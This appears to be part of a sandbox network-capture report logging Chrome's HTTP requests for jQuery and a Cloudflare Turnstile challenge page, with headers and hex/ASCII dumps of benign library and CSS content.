                                                                                                    2025-01-14 17:35:51 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:51 UTC613INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 89501
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Tue, 14 Jan 2025 17:35:51 GMT
                                                                                                    Age: 2360677
                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740076-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 2774, 5
                                                                                                    X-Timer: S1736876152.721471,VS0,VE0
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-14 17:35:51 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                    2025-01-14 17:35:51 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                    2025-01-14 17:35:51 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                    2025-01-14 17:35:51 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                    2025-01-14 17:35:51 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                    2025-01-14 17:35:51 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.556408104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:52 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:52 UTC1362INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 26635
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                    origin-agent-cluster: ?1
                                                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                    referrer-policy: same-origin
                                                                                                    document-policy: js-profiling
                                                                                                    2025-01-14 17:35:52 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 31 66 36 32 39 31 35 38 37 34 34 33 36 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                    Data Ascii: Server: cloudflareCF-RAY: 901f629158744368-EWRalt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:52 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                    Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                    Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                    Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                    Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                    Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                    Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                    Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                    2025-01-14 17:35:52 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                    Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.556413104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:52 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:52 UTC471INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:52 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 47521
                                                                                                    Connection: close
                                                                                                    accept-ranges: bytes
                                                                                                    last-modified: Wed, 08 Jan 2025 13:42:47 GMT
